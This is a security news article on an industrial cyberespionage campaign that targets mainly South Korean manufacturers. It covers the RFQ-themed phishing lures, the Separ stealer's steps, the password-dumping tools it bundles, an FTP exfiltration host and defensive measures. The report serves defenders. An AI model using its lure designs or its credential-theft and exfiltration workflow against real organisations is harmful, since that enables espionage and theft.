An ongoing industrial cyberespionage campaign is targeting hundreds of manufacturing and other industrial firms primarily located in South Korea, new research found.
The campaign steals passwords and documents. That information could then end up used to purloin trade secrets and valuable intellectual property, perform cyber reconnaissance for future attacks, and compromise industrial control networks for ransomware attacks, according to a report from David Atch, Maayan Shaul, Gil Regev, Ori Perez, and Phil Neray of CyberX’s threat intelligence team, Section 52.
The campaign uses spear phishing emails with industrial-themed attachments including:
• An RFQ for designing a power plant in the Czech Republic, which appears to have been sent by an employee of a Siemens subsidiary that manufactures industrial machinery. This email includes a schematic of the power plant and a publicly-available technical white paper about the gasification of the plant, which is located in Vresova, Czech Republic.
• An RFQ for designing a coal-fired power plant in Indonesia, purporting to be from the engineering subsidiary of a major Japanese conglomerate. To increase its appearance of legitimacy, the email includes a publicly-available PDF of the company’s corporate profile.
• An email purporting to be from a buyer at a major European engineering company that designs gas processing and production plants.
CyberX identified more than 200 compromised systems from this campaign, including one belonging to a multi-billion dollar Korean conglomerate that manufactures critical infrastructure equipment such as heavy equipment for power transmission and distribution facilities, renewable energy, chemical plants, welding, and construction.
Other South Korean victims include:
• Steel manufacturer
• Chemical plant construction firm
• Pipe manufacturer
• Valve manufacturer
• Engineering firm
The Section 52 team used an automated threat extraction platform called Ganymede to identify malware and APT campaigns targeting industrial and critical infrastructure organizations.
Ganymede continuously ingests large amounts of data from a range of open and closed sources. It uses machine learning algorithms to identify documents with IoT/ICS-specific content as well as any malicious attachments, and to monitor domains of industrial companies that might be targeted.
The Gangnam Industrial Style campaign uses a new version of the Separ credential stealing malware, first identified by SonicWALL in 2013, the researchers said.
In this case, however, the malware is specifically targeting industrial organizations.
Once installed, the malware steals browser and email credentials and searches for documents with a range of extensions, including Office documents and images. It exfiltrates all compromised information via FTP to a free web hosting service (freehostia.com).
The malware is hidden inside a zip file attached to the phishing emails. Once unzipped, the files often appear to be PDF files (with the PDF icon) but are actually malicious executables, the researchers said. The executables are a series of scripts compiled using the Quick Batch File Compiler.
The malware performs the following steps:
• Runs ipconfig to map all network adapters on the compromised system
• Disables Windows firewall
• Dumps browser passwords
• Dumps email passwords
• Collects files with specific extensions from user folders, mostly documents
• Uploads all the results to the ftp server ftp[.]freehostia[.]com
The malware incorporates the following tools, most of which are freely available on the Internet:
• Browser Password Dump v6.0 by SecurityXploded
• Email Password Dump v3.0 by SecurityXploded
• NcFTPPut 3.2.5 – Free FTP client
• The LaZagne Project (password dumper from https://github.com/AlessandroZ/LaZagne)
• deltree (Folder delete from https://github.com/johnmbaughman/deltree)
• Command Line Process Viewer/Killer/Suspender for Windows NT/2000/XP V2.03
• MOVEit Freely 184.108.40.206 – Secure FTP Client
• Sleep tool by tricerat
The Separ malware collects files as well as passwords from compromised systems, whereas the previous version only collected passwords, researchers said. In addition, the new version uses Autorun to persist after reboots.
The Gangnam Industrial Style campaign is ongoing, because new stolen credentials are still being uploaded to the adversary’s C2 server, the researchers said.
Over the past few months, Section 52 identified the following countries and industries targeted by the malware:
• Distribution of targeted companies by region: Japan, Indonesia, Turkey, Germany, Ecuador, UK, Korea, China, Thailand, and other.
• Distribution of targets by industry: Manufacturing, steel, engineering, conglomerate, and other.
Safeguarding your organization from these targeted industrial campaigns requires a multi-layered defense incorporating:
1. Teaching employees to be wary of email attachments, especially zipped or compressed files purporting to contain details about “RFPs”.
2. Email security to detect suspicious emails.
3. Endpoint security to identify malware.
4. Network segmentation to restrict the adversary’s ability to navigate from IT to OT networks.
5. Secure remote access solutions with MFA to prevent unauthorized access using stolen credentials.
6. IoT/ICS-specific network security monitoring to detect suspicious or unauthorized access to industrial control networks.
7. Industrial threat intelligence to stay current about these types of attacks, while operationalizing this intelligence by integrating it with your security stack (SIEMs, monitoring systems, etc.).